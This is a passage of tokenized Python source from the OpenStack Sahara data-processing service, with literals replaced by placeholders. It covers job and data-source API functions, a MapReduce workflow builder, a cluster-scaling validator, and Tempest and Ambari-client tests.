[ ] <EOL> for job_type in job_types : <EOL> job_entry = { "<STR_LIT:name>" : job_type , <EOL> "<STR_LIT>" : [ ] } <EOL> for plugin in plugins : <EOL> types_for_plugin = plugin . get_edp_job_types ( versions ) <EOL> p = plugin . dict <EOL> p [ "<STR_LIT>" ] = { } <EOL> for version , supported_types in six . iteritems ( types_for_plugin ) : <EOL> if job_type in supported_types : <EOL> if hints : <EOL> config_hints = plugin . get_edp_config_hints ( job_type , <EOL> version ) <EOL> else : <EOL> config_hints = { } <EOL> p [ "<STR_LIT>" ] [ version ] = config_hints <EOL> if p [ "<STR_LIT>" ] : <EOL> job_entry [ "<STR_LIT>" ] . append ( p ) <EOL> if job_entry [ "<STR_LIT>" ] : <EOL> res . append ( job_entry ) <EOL> return res <EOL> def get_job_config_hints ( job_type ) : <EOL> return manager . get_job_config_hints ( job_type ) <EOL> def execute_job ( job_id , data ) : <EOL> cluster_id = data [ '<STR_LIT>' ] <EOL> configs = data . get ( '<STR_LIT>' , { } ) <EOL> interface = data . get ( '<STR_LIT>' , { } ) <EOL> input_id = data . get ( '<STR_LIT>' , None ) <EOL> output_id = data . get ( '<STR_LIT>' , None ) <EOL> job_execution_info = data . get ( '<STR_LIT>' , { } ) <EOL> configs [ '<STR_LIT>' ] = job_execution_info <EOL> job_ex_dict = { '<STR_LIT>' : input_id , '<STR_LIT>' : output_id , <EOL> '<STR_LIT>' : job_id , '<STR_LIT>' : cluster_id , <EOL> '<STR_LIT:info>' : { '<STR_LIT:status>' : edp . JOB_STATUS_PENDING } , <EOL> '<STR_LIT>' : configs , '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : interface } <EOL> job_execution = conductor . job_execution_create ( context . ctx ( ) , job_ex_dict ) <EOL> context . set_current_job_execution_id ( job_execution . id ) <EOL> if p . job_execution_requires_proxy_user ( job_execution ) : <EOL> try : <EOL> p . create_proxy_user_for_job_execution ( job_execution ) <EOL> except ex . SaharaException as e : <EOL> LOG . error ( _LE ( "<STR_LIT>" <EOL> "<STR_LIT>" ) . format ( reason = e ) ) <EOL> conductor . job_execution_destroy ( context . ctx ( ) , job_execution ) <EOL> raise e <EOL> api . OPS . run_edp_job ( job_execution . id ) <EOL> return job_execution <EOL> def get_job_execution_status ( id ) : <EOL> return manager . get_job_status ( id ) <EOL> def job_execution_list ( ** kwargs ) : <EOL> return conductor . job_execution_get_all ( context . ctx ( ) , <EOL> regex_search = True , ** kwargs ) <EOL> def get_job_execution ( id ) : <EOL> return conductor . job_execution_get ( context . ctx ( ) , id ) <EOL> def cancel_job_execution ( id ) : <EOL> context . set_current_job_execution_id ( id ) <EOL> job_execution = conductor . job_execution_get ( context . ctx ( ) , id ) <EOL> api . OPS . cancel_job_execution ( id ) <EOL> return job_execution <EOL> def update_job_execution ( id , values ) : <EOL> _update_status ( values . pop ( "<STR_LIT:info>" , None ) ) <EOL> return conductor . job_execution_update ( context . ctx ( ) , id , values ) <EOL> def _update_status ( info ) : <EOL> if info : <EOL> status = info . get ( "<STR_LIT:status>" , None ) <EOL> if status == edp . JOB_ACTION_SUSPEND : <EOL> api . OPS . job_execution_suspend ( id ) <EOL> def delete_job_execution ( id ) : <EOL> context . set_current_job_execution_id ( id ) <EOL> api . OPS . delete_job_execution ( id ) <EOL> def get_data_sources ( ** kwargs ) : <EOL> return conductor . data_source_get_all ( context . ctx ( ) , <EOL> regex_search = True , ** kwargs ) <EOL> def get_data_source ( id ) : <EOL> return conductor . data_source_get ( context . ctx ( ) , id ) <EOL> def delete_data_source ( id ) : <EOL> conductor . data_source_destroy ( context . ctx ( ) , id ) <EOL> def register_data_source ( values ) : <EOL> return conductor . data_source_create ( context . ctx ( ) , values ) <EOL> def data_source_update ( id , values ) : <EOL> return conductor . data_source_update ( context . ctx ( ) , id , values ) <EOL> def get_jobs ( ** kwargs ) : <EOL> return conductor . job_get_all ( context . ctx ( ) , regex_search = True , ** kwargs ) <EOL> def get_job ( id ) : <EOL> return conductor . job_get ( context . ctx ( ) , id ) <EOL> def create_job ( values ) : <EOL> return conductor . job_create ( context . ctx ( ) , values ) <EOL> def update_job ( id , values ) : <EOL> return conductor . job_update ( context . ctx ( ) , id , values ) <EOL> def delete_job ( job_id ) : <EOL> return conductor . job_destroy ( context . ctx ( ) , job_id ) <EOL> def create_job_binary ( values ) : <EOL> return conductor . job_binary_create ( context . ctx ( ) , values ) <EOL> def get_job_binaries ( ** kwargs ) : <EOL> return conductor . job_binary_get_all ( context . ctx ( ) , <EOL> regex_search = True , ** kwargs ) <EOL> def get_job_binary ( id ) : <EOL> return conductor . job_binary_get ( context . ctx ( ) , id ) <EOL> def update_job_binary ( id , values ) : <EOL> return conductor . job_binary_update ( context . ctx ( ) , id , values ) <EOL> def delete_job_binary ( id ) : <EOL> conductor . job_binary_destroy ( context . ctx ( ) , id ) <EOL> def create_job_binary_internal ( values ) : <EOL> return conductor . job_binary_internal_create ( context . ctx ( ) , values ) <EOL> def get_job_binary_internals ( ** kwargs ) : <EOL> return conductor . job_binary_internal_get_all ( context . ctx ( ) , <EOL> regex_search = True , ** kwargs ) <EOL> def get_job_binary_internal ( id ) : <EOL> return conductor . job_binary_internal_get ( context . ctx ( ) , id ) <EOL> def delete_job_binary_internal ( id ) : <EOL> conductor . job_binary_internal_destroy ( context . ctx ( ) , id ) <EOL> def get_job_binary_internal_data ( id ) : <EOL> return conductor . job_binary_internal_get_raw_data ( context . ctx ( ) , id ) <EOL> def update_job_binary_internal ( id , values ) : <EOL> return conductor . job_binary_internal_update ( context . ctx ( ) , id , values ) <EOL> def get_job_binary_data ( id ) : <EOL> job_binary = conductor . job_binary_get ( context . ctx ( ) , id ) <EOL> return dispatch . get_raw_binary ( job_binary , with_context = True ) </s>
<s> from sahara . service . edp . oozie . workflow_creator import base_workflow <EOL> class MapReduceWorkFlowCreator ( base_workflow . OozieWorkflowCreator ) : <EOL> def __init__ ( self ) : <EOL> super ( MapReduceWorkFlowCreator , self ) . __init__ ( '<STR_LIT>' ) <EOL> def build_workflow_xml ( self , prepare = None , <EOL> job_xml = None , configuration = None , <EOL> files = None , archives = None , <EOL> streaming = None ) : <EOL> prepare = prepare or { } <EOL> files = files or [ ] <EOL> archives = archives or [ ] <EOL> streaming = streaming or { } <EOL> for k in sorted ( prepare ) : <EOL> self . _add_to_prepare_element ( k , prepare [ k ] ) <EOL> for k in sorted ( streaming ) : <EOL> self . _add_to_streaming_element ( k , streaming [ k ] ) <EOL> self . _add_job_xml_element ( job_xml ) <EOL> self . _add_configuration_elements ( configuration ) <EOL> self . _add_files_and_archives ( files , archives ) </s>
<s> from sahara import context <EOL> import sahara . exceptions as ex <EOL> from sahara . i18n import _ <EOL> import sahara . plugins . base as plugin_base <EOL> from sahara . service import api as service_api <EOL> from sahara . service . api import v10 as api <EOL> from sahara . service . validations import acl <EOL> import sahara . service . validations . base as b <EOL> from sahara . utils import cluster as c_u <EOL> def check_cluster_scaling ( data , cluster_id , ** kwargs ) : <EOL> ctx = context . current ( ) <EOL> cluster = api . get_cluster ( id = cluster_id ) <EOL> if cluster is None : <EOL> raise ex . NotFoundException ( <EOL> { '<STR_LIT:id>' : cluster_id } , _ ( '<STR_LIT>' ) ) <EOL> acl . check_tenant_for_update ( ctx , cluster ) <EOL> acl . check_protected_from_update ( cluster , data ) <EOL> cluster_engine = cluster . sahara_info . get ( <EOL> '<STR_LIT>' ) if cluster . sahara_info else None <EOL> engine_type_and_version = service_api . OPS . get_engine_type_and_version ( ) <EOL> if ( not cluster_engine and <EOL> not engine_type_and_version . startswith ( '<STR_LIT>' ) ) : <EOL> raise ex . InvalidReferenceException ( <EOL> _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % <EOL> { "<STR_LIT>" : engine_type_and_version } ) <EOL> if ( cluster . sahara_info and <EOL> cluster_engine != engine_type_and_version ) : <EOL> raise ex . InvalidReferenceException ( <EOL> _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % <EOL> { "<STR_LIT>" : cluster . sahara_info . get ( '<STR_LIT>' ) , <EOL> "<STR_LIT>" : engine_type_and_version } ) <EOL> if not ( plugin_base . PLUGINS . is_plugin_implements ( cluster . plugin_name , <EOL> '<STR_LIT>' ) and ( <EOL> plugin_base . PLUGINS . is_plugin_implements ( cluster . plugin_name , <EOL> '<STR_LIT>' ) ) ) : <EOL> raise ex . InvalidReferenceException ( <EOL> _ ( "<STR_LIT>" ) <EOL> % cluster . plugin_name ) <EOL> if cluster . status != c_u . CLUSTER_STATUS_ACTIVE : <EOL> raise ex . InvalidReferenceException ( <EOL> _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % cluster . status ) <EOL> if data . get ( "<STR_LIT>" ) : <EOL> b . check_resize ( cluster , data [ '<STR_LIT>' ] ) <EOL> if data . get ( "<STR_LIT>" ) : <EOL> b . check_add_node_groups ( cluster , data [ '<STR_LIT>' ] ) <EOL> b . check_network_config ( data [ '<STR_LIT>' ] , <EOL> cluster . has_proxy_gateway ( ) ) <EOL> b . check_cluster_hostnames_lengths ( cluster . name , <EOL> data [ '<STR_LIT>' ] ) </s>
<s> import time <EOL> from oslo_utils import timeutils <EOL> from saharaclient . api import base as sab <EOL> from tempest import config <EOL> from tempest import exceptions <EOL> from tempest . lib . common . utils import data_utils <EOL> from tempest . lib import decorators <EOL> from tempest import test <EOL> from sahara . tests . tempest . scenario . data_processing . client_tests import base <EOL> TEMPEST_CONF = config . CONF <EOL> class JobExecutionTest ( base . BaseDataProcessingTest ) : <EOL> def _check_register_image ( self , image_id ) : <EOL> self . client . images . update_image ( <EOL> image_id , TEMPEST_CONF . scenario . ssh_user , '<STR_LIT>' ) <EOL> reg_image = self . client . images . get ( image_id ) <EOL> self . assertDictContainsSubset ( <EOL> { '<STR_LIT>' : TEMPEST_CONF . scenario . ssh_user } , <EOL> reg_image . metadata ) <EOL> def _check_image_get ( self , image_id ) : <EOL> image = self . client . images . get ( image_id ) <EOL> self . assertEqual ( image_id , image . id ) <EOL> def _check_image_list ( self , image_id ) : <EOL> image_list = self . client . images . list ( ) <EOL> images_info = [ image . id for image in image_list ] <EOL> self . assertIn ( image_id , images_info ) <EOL> def _check_adding_tags ( self , image_id ) : <EOL> self . client . images . update_tags ( image_id , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> image = self . client . images . get ( image_id ) <EOL> self . assertDictContainsSubset ( { '<STR_LIT>' : '<STR_LIT:True>' , <EOL> '<STR_LIT>' : '<STR_LIT:True>' } , <EOL> image . metadata ) <EOL> def _check_deleting_tags ( self , image_id ) : <EOL> self . client . images . update_tags ( image_id , [ ] ) <EOL> image = self . client . images . get ( image_id ) <EOL> self . assertNotIn ( '<STR_LIT>' , image . metadata ) <EOL> self . assertNotIn ( '<STR_LIT>' , image . metadata ) <EOL> def _check_unregister_image ( self , image_id ) : <EOL> self . client . images . unregister_image ( image_id ) <EOL> image_list = self . client . images . list ( ) <EOL> self . assertNotIn ( image_id , [ image . id for image in image_list ] ) <EOL> def _check_cluster_create ( self ) : <EOL> worker = self . create_node_group_template ( <EOL> data_utils . rand_name ( '<STR_LIT>' ) , ** self . worker_template ) <EOL> master = self . create_node_group_template ( <EOL> data_utils . rand_name ( '<STR_LIT>' ) , ** self . master_template ) <EOL> cluster_templ = self . cluster_template . copy ( ) <EOL> cluster_templ [ '<STR_LIT>' ] = [ <EOL> { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : master . id , <EOL> '<STR_LIT:count>' : <NUM_LIT:1> <EOL> } , <EOL> { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : worker . id , <EOL> '<STR_LIT:count>' : <NUM_LIT:3> <EOL> } <EOL> ] <EOL> if TEMPEST_CONF . service_available . neutron : <EOL> cluster_templ [ '<STR_LIT>' ] = self . get_private_network_id ( ) <EOL> cluster_template = self . create_cluster_template ( <EOL> data_utils . rand_name ( '<STR_LIT>' ) , ** cluster_templ ) <EOL> cluster_name = data_utils . rand_name ( '<STR_LIT>' ) <EOL> self . cluster_info = { <EOL> '<STR_LIT:name>' : cluster_name , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : cluster_template . id , <EOL> '<STR_LIT>' : TEMPEST_CONF . data_processing . fake_image_id <EOL> } <EOL> cluster = self . create_cluster ( ** self . cluster_info ) <EOL> self . check_cluster_active ( cluster . id ) <EOL> self . assertEqual ( cluster_name , cluster . name ) <EOL> self . assertDictContainsSubset ( self . cluster_info , cluster . __dict__ ) <EOL> return cluster . id , cluster . name <EOL> def _check_cluster_list ( self , cluster_id , cluster_name ) : <EOL> cluster_list = self . client . clusters . list ( ) <EOL> clusters_info = [ ( clust . id , clust . name ) for clust in cluster_list ] <EOL> self . assertIn ( ( cluster_id , cluster_name ) , clusters_info ) <EOL> def _check_cluster_get ( self , cluster_id , cluster_name ) : <EOL> cluster = self . client . clusters . get ( cluster_id ) <EOL> self . assertEqual ( cluster_name , cluster . name ) <EOL> self . assertDictContainsSubset ( self . cluster_info , cluster . __dict__ ) <EOL> def _check_cluster_update ( self , cluster_id ) : <EOL> values = { <EOL> '<STR_LIT:name>' : data_utils . rand_name ( '<STR_LIT>' ) , <EOL> '<STR_LIT:description>' : '<STR_LIT:description>' <EOL> } <EOL> cluster = self . client . clusters . update ( cluster_id ) <EOL> self . assertDictContainsSubset ( values , cluster . __dict__ ) <EOL> def _check_cluster_scale ( self , cluster_id ) : <EOL> big_worker = self . create_node_group_template ( <EOL> data_utils . rand_name ( '<STR_LIT>' ) , ** self . worker_template ) <EOL> scale_body = { <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT:count>' : <NUM_LIT:2> , <EOL> '<STR_LIT:name>' : '<STR_LIT>' <EOL> } , <EOL> { <EOL> "<STR_LIT:count>" : <NUM_LIT:2> , <EOL> "<STR_LIT:name>" : '<STR_LIT>' <EOL> } <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> { <EOL> '<STR_LIT:count>' : <NUM_LIT:1> , <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : big_worker . id <EOL> } <EOL> ] <EOL> } <EOL> self . client . clusters . scale ( cluster_id , scale_body ) <EOL> self . check_cluster_active ( cluster_id ) <EOL> cluster = self . client . clusters . get ( cluster_id ) <EOL> for ng in cluster . node_groups : <EOL> if ng [ '<STR_LIT:name>' ] == scale_body [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:name>' ] : <EOL> self . assertDictContainsSubset ( <EOL> scale_body [ '<STR_LIT>' ] [ <NUM_LIT:0> ] , ng ) <EOL> elif ng [ '<STR_LIT:name>' ] == scale_body [ '<STR_LIT>' ] [ <NUM_LIT:1> ] [ '<STR_LIT:name>' ] : <EOL> self . assertDictContainsSubset ( <EOL> scale_body [ '<STR_LIT>' ] [ <NUM_LIT:1> ] , ng ) <EOL> elif ng [ '<STR_LIT:name>' ] == scale_body [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT:name>' ] : <EOL> self . assertDictContainsSubset ( <EOL> scale_body [ '<STR_LIT>' ] [ <NUM_LIT:0> ] , ng ) <EOL> def _check_cluster_delete ( self , cluster_id ) : <EOL> self . client . clusters . delete ( cluster_id ) <EOL> cluster = self . client . clusters . get ( cluster_id ) <EOL> self . assertEqual ( '<STR_LIT>' , cluster . status ) <EOL> timeout = TEMPEST_CONF . data_processing . cluster_timeout <EOL> s_time = timeutils . utcnow ( ) <EOL> while timeutils . delta_seconds ( s_time , timeutils . utcnow ( ) ) < timeout : <EOL> try : <EOL> self . client . clusters . get ( cluster_id ) <EOL> except sab . APIException : <EOL> return <EOL> time . sleep ( TEMPEST_CONF . data_processing . request_timeout ) <EOL> raise exceptions . TimeoutException ( '<STR_LIT>' <EOL> '<STR_LIT>' % timeout ) <EOL> def _check_job_execution_create ( self , cluster_id ) : <EOL> container_name = data_utils . rand_name ( '<STR_LIT>' ) <EOL> self . create_container ( container_name ) <EOL> input_file_name = data_utils . rand_name ( '<STR_LIT:input>' ) <EOL> self . object_client . create_object ( container_name , input_file_name , <EOL> '<STR_LIT>' ) <EOL> input_file_url = '<STR_LIT>' % ( container_name , input_file_name ) <EOL> input_source_name = data_utils . rand_name ( '<STR_LIT>' ) <EOL> input_source = self . create_data_source ( <EOL> input_source_name , input_file_url , '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT:user>' : '<STR_LIT:test>' , '<STR_LIT:password>' : '<STR_LIT>' } ) <EOL> output_dir_name = data_utils . rand_name ( '<STR_LIT>' ) <EOL> output_dir_url = '<STR_LIT>' % ( container_name , output_dir_name ) <EOL> output_source_name = data_utils . rand_name ( '<STR_LIT>' ) <EOL> output_source = self . create_data_source ( <EOL> output_source_name , output_dir_url , '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT:user>' : '<STR_LIT:test>' , '<STR_LIT:password>' : '<STR_LIT>' } ) <EOL> job_binary = { <EOL> '<STR_LIT:name>' : data_utils . rand_name ( '<STR_LIT>' ) , <EOL> '<STR_LIT:url>' : input_file_url , <EOL> '<STR_LIT:description>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:user>' : '<STR_LIT:test>' , <EOL> '<STR_LIT:password>' : '<STR_LIT>' <EOL> } <EOL> } <EOL> job_binary = self . create_job_binary ( ** job_binary ) <EOL> job_name = data_utils . rand_name ( '<STR_LIT>' ) <EOL> job = self . create_job ( job_name , '<STR_LIT>' , [ job_binary . id ] ) <EOL> self . job_exec_info = { <EOL> '<STR_LIT>' : job . id , <EOL> '<STR_LIT>' : cluster_id , <EOL> '<STR_LIT>' : input_source . id , <EOL> '<STR_LIT>' : output_source . id , <EOL> '<STR_LIT>' : { } <EOL> } <EOL> job_execution = self . create_job_execution ( ** self . job_exec_info ) <EOL> return job_execution . id <EOL> def _check_job_execution_list ( self , job_exec_id ) : <EOL> job_exec_list = self . client . job_executions . list ( ) <EOL> self . assertIn ( job_exec_id , [ job_exec . id for job_exec in job_exec_list ] ) <EOL> def _check_job_execution_get ( self , job_exec_id ) : <EOL> job_exec = self . client . job_executions . get ( job_exec_id ) <EOL> job_exec_info = self . job_exec_info . copy ( ) <EOL> del job_exec_info [ '<STR_LIT>' ] <EOL> self . assertDictContainsSubset ( job_exec_info , job_exec . __dict__ ) <EOL> def _check_job_execution_update ( self , job_exec_id ) : <EOL> values = { <EOL> '<STR_LIT>' : True <EOL> } <EOL> job_exec = self . client . job_executions . update ( job_exec_id , ** values ) <EOL> self . assertDictContainsSubset ( values , job_exec . __dict__ ) <EOL> def _check_job_execution_delete ( self , job_exec_id ) : <EOL> self . client . job_executions . delete ( job_exec_id ) <EOL> job_exec_list = self . client . jobs . list ( ) <EOL> self . assertNotIn ( job_exec_id , [ job_exec . id for <EOL> job_exec in job_exec_list ] ) <EOL> @ decorators . skip_because ( bug = "<STR_LIT>" ) <EOL> @ test . attr ( type = '<STR_LIT>' ) <EOL> @ test . services ( '<STR_LIT>' ) <EOL> def test_job_executions ( self ) : <EOL> image_id = TEMPEST_CONF . data_processing . fake_image_id <EOL> self . _check_register_image ( image_id ) <EOL> self . _check_image_get ( image_id ) <EOL> self . _check_image_list ( image_id ) <EOL> self . _check_adding_tags ( image_id ) <EOL> cluster_id , cluster_name = self . _check_cluster_create ( ) <EOL> self . _check_cluster_list ( cluster_id , cluster_name ) <EOL> self . _check_cluster_get ( cluster_id , cluster_name ) <EOL> self . _check_cluster_update ( cluster_id ) <EOL> self . _check_cluster_scale ( cluster_id ) <EOL> job_exec_id = self . _check_job_execution_create ( cluster_id ) <EOL> self . _check_job_execution_list ( job_exec_id ) <EOL> self . _check_job_execution_get ( job_exec_id ) <EOL> self . _check_job_execution_update ( job_exec_id ) <EOL> self . _check_job_execution_delete ( job_exec_id ) <EOL> self . _check_cluster_delete ( cluster_id ) <EOL> self . _check_deleting_tags ( image_id ) <EOL> self . _check_unregister_image ( image_id ) <EOL> @ classmethod <EOL> def tearDownClass ( cls ) : <EOL> image_list = cls . client . images . list ( ) <EOL> image_id = TEMPEST_CONF . data_processing . fake_image_id <EOL> if image_id in [ image . id for image in image_list ] : <EOL> cls . client . images . unregister_image ( image_id ) <EOL> super ( JobExecutionTest , cls ) . tearDownClass ( ) </s>
<s> import mock <EOL> from oslo_serialization import jsonutils <EOL> from sahara . plugins . ambari import client as ambari_client <EOL> from sahara . plugins import exceptions as p_exc <EOL> from sahara . tests . unit import base <EOL> class AmbariClientTestCase ( base . SaharaTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( AmbariClientTestCase , self ) . setUp ( ) <EOL> self . http_client = mock . Mock ( ) <EOL> self . http_client . get = mock . Mock ( ) <EOL> self . http_client . post = mock . Mock ( ) <EOL> self . http_client . put = mock . Mock ( ) <EOL> self . http_client . delete = mock . Mock ( ) <EOL> self . headers = { "<STR_LIT>" : "<STR_LIT>" } <EOL> self . remote = mock . Mock ( ) <EOL> self . remote . get_http_client . return_value = self . http_client <EOL> self . instance = mock . Mock ( ) <EOL> self . instance . remote . return_value = self . remote <EOL> self . instance . management_ip = "<STR_LIT>" <EOL> self . good_pending_resp = mock . MagicMock ( ) <EOL> self . good_pending_resp . status_code = <NUM_LIT:200> <EOL> self . good_pending_resp . text = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def test_init_client_default ( self ) : <EOL> client = ambari_client . AmbariClient ( self . instance ) <EOL> self . assertEqual ( self . http_client , client . _http_client ) <EOL> self . assertEqual ( "<STR_LIT>" , client . _base_url ) <EOL> self . assertEqual ( "<STR_LIT>" , client . _auth . username ) <EOL> self . assertEqual ( "<STR_LIT>" , client . _auth . password ) <EOL> self . remote . get_http_client . assert_called_with ( "<STR_LIT>" ) <EOL> def test_init_client_manual ( self ) : <EOL> client = ambari_client . AmbariClient ( self . instance , port = "<STR_LIT>" , <EOL> username = "<STR_LIT:user>" , password = "<STR_LIT>" ) <EOL> self . assertEqual ( "<STR_LIT>" , client . _base_url ) <EOL> self . assertEqual ( "<STR_LIT:user>" , client . _auth . username ) <EOL> self . assertEqual ( "<STR_LIT>" , client . _auth . password ) <EOL> self . remote . get_http_client . assert_called_with ( "<STR_LIT>" ) <EOL> def test_close_http_session ( self ) : <EOL> with ambari_client . AmbariClient ( self . instance ) : <EOL> pass <EOL> self . remote . close_http_session . assert_called_with ( "<STR_LIT>" ) <EOL> def test_get_method ( self ) : <EOL> client = ambari_client . AmbariClient ( self . instance ) <EOL> client . get ( "<STR_LIT>" ) <EOL> self . http_client . get . assert_called_with ( <EOL> "<STR_LIT>" , verify = False , auth = client . _auth , <EOL> headers = self . headers ) <EOL> def test_post_method ( self ) : <EOL> client = ambari_client . AmbariClient ( self . instance ) <EOL> client . post ( "<STR_LIT>" , data = "<STR_LIT:data>" ) <EOL> self . http_client . post . assert_called_with ( <EOL> "<STR_LIT>" , data = "<STR_LIT:data>" , verify = False , auth = client . _auth , <EOL> headers = self . headers ) <EOL> def test_put_method ( self ) : <EOL> client = ambari_client . AmbariClient ( self . instance ) <EOL> client . put ( "<STR_LIT>" , data = "<STR_LIT:data>" ) <EOL> self . http_client . put . assert_called_with ( <EOL> "<STR_LIT>" , data = "<STR_LIT:data>" , verify = False , auth = client . _auth , <EOL> headers = self . headers ) <EOL> def test_delete_method ( self ) : <EOL> client = ambari_client . AmbariClient ( self . instance ) <EOL> client . delete ( "<STR_LIT>" ) <EOL> self . http_client . delete . assert_called_with ( <EOL> "<STR_LIT>" , verify = False , auth = client . _auth , <EOL> headers = self . headers ) <EOL> def test_get_registered_hosts ( self ) : <EOL> client = ambari_client . AmbariClient ( self . instance ) <EOL> resp_data = """<STR_LIT>""" <EOL> resp = mock . Mock ( ) <EOL> resp . text = resp_data <EOL> resp . status_code = <NUM_LIT:200> <EOL> self . http_client . get . return_value = resp <EOL> hosts = client . get_registered_hosts ( ) <EOL> self . http_client . get . assert_called_with ( <EOL> "<STR_LIT>" , verify = False , <EOL> auth = client . _auth , headers = self . headers ) <EOL> self . assertEqual ( <NUM_LIT:3> , len ( hosts ) ) <EOL> self . assertEqual ( "<STR_LIT>" , hosts [ <NUM_LIT:0> ] [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( "<STR_LIT>" , hosts [ <NUM_LIT:1> ] [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) <EOL> self . assertEqual ( "<STR_LIT>" , hosts [ <NUM_LIT:2> ] [ "<STR_LIT>" ] [ "<STR_LIT>" ] ) <EOL> def test_update_user_password ( self ) : <EOL> client = ambari_client . AmbariClient ( self . instance ) <EOL> resp = mock . Mock ( ) <EOL> resp . text = "<STR_LIT>" <EOL> resp . status_code = <NUM_LIT:200> <EOL> self . http_client . put . return_value = resp <EOL> client . update_user_password ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> exp_req = jsonutils . dumps ( { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:password>" : "<STR_LIT>" <EOL> } <EOL> } ) <EOL> self . http_client . put . assert_called_with ( <EOL> "<STR_LIT>" , data = exp_req , <EOL> verify = False , auth = client . _auth , headers = self . headers ) <EOL> def test_create_blueprint ( self ) : <EOL> client = ambari_client . AmbariClient ( self . instance ) <EOL> resp = mock . Mock ( ) <EOL> resp . text = "<STR_LIT>" <EOL> resp . status_code = <NUM_LIT:200> <EOL> self . http_client . post . return_value = resp <EOL> client . create_blueprint ( "<STR_LIT>" , { "<STR_LIT>" : "<STR_LIT:data>" } ) <EOL> self . http_client . post . assert_called_with ( <EOL> "<STR_LIT>" , <EOL> data = jsonutils . dumps ( { "<STR_LIT>" : "<STR_LIT:data>" } ) , verify = False , <EOL> auth = client . _auth , headers = self . headers ) <EOL> def test_create_cluster ( self ) : <EOL> client = ambari_client . AmbariClient ( self . instance ) <EOL> resp = mock . Mock ( ) <EOL> resp . text = """<STR_LIT>""" <EOL> resp . status_code = <NUM_LIT:200> <EOL> self . http_client . post . return_value = resp <EOL> req_info = client . create_cluster ( "<STR_LIT>" , { "<STR_LIT>" : "<STR_LIT:data>" } ) <EOL> self . assertEqual ( <NUM_LIT:1> , req_info [ "<STR_LIT:id>" ] ) <EOL> self . http_client . post . assert_called_with ( <EOL> "<STR_LIT>" , <EOL> data = jsonutils . dumps ( { "<STR_LIT>" : "<STR_LIT:data>" } ) , verify = False , <EOL> auth = client . _auth , headers = self . headers ) <EOL> def test_start_process_on_host ( self ) : <EOL> client = ambari_client . AmbariClient ( self . instance ) <EOL> self . http_client . put . return_value = self . good_pending_resp <EOL> client . wait_ambari_request = mock . MagicMock ( ) <EOL> instance = mock . MagicMock ( ) <EOL> instance . fqdn . return_value = "<STR_LIT>" <EOL> instance . cluster . name = "<STR_LIT>" <EOL> client . start_service_on_host ( instance , "<STR_LIT>" , '<STR_LIT>' ) <EOL> self . http_client . put . assert_called_with ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> data = jsonutils . dumps ( <EOL> { <EOL> "<STR_LIT>" : { "<STR_LIT:state>" : "<STR_LIT>" } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> "<STR_LIT>" } <EOL> } ) , <EOL> verify = False , auth = client . _auth , headers = self . headers ) <EOL> def test_stop_process_on_host ( self ) : <EOL> client = ambari_client . AmbariClient ( self . instance ) <EOL> check_mock = mock . MagicMock ( ) <EOL> check_mock . status_code = <NUM_LIT:200> <EOL> check_mock . text = '<STR_LIT>' <EOL> self . http_client . get . return_value = check_mock <EOL> self . http_client . put . return_value = self . good_pending_resp <EOL> client . wait_ambari_request = mock . MagicMock ( ) <EOL> instance = mock . MagicMock ( ) <EOL> instance . fqdn . return_value = "<STR_LIT>" <EOL> client . stop_process_on_host ( "<STR_LIT>" , instance , "<STR_LIT>" ) <EOL> self . http_client . put . assert_called_with ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> data = jsonutils . dumps ( <EOL> { <EOL> "<STR_LIT>" : { "<STR_LIT:state>" : "<STR_LIT>" } , <EOL> "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } <EOL> } ) , <EOL> verify = False , auth = client . _auth , headers = self . headers ) <EOL> @ mock . patch ( "<STR_LIT>" ) <EOL> def test_wait_ambari_request ( self , mock_context ) : <EOL> client = ambari_client . AmbariClient ( self . instance ) <EOL> check_mock = mock . MagicMock ( ) <EOL> d1 = { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> } <EOL> d2 = { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT:100> } <EOL> check_mock . side_effect = [ d1 , d2 ] <EOL> client . check_request_status = check_mock <EOL> client . wait_ambari_request ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> check_mock . assert_has_calls ( [ mock . call ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> mock . call ( "<STR_LIT>" , "<STR_LIT>" ) ] ) <EOL> @ mock . patch ( "<STR_LIT>" ) <EOL> def test_wait_ambari_request_error ( self , mock_context ) : <EOL> client = ambari_client . AmbariClient ( self . instance ) <EOL> check_mock = mock . MagicMock ( ) <EOL> d1 = { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> } <EOL> check_mock . return_value = d1 <EOL> client . check_request_status = check_mock <EOL> self . assertRaises ( p_exc . 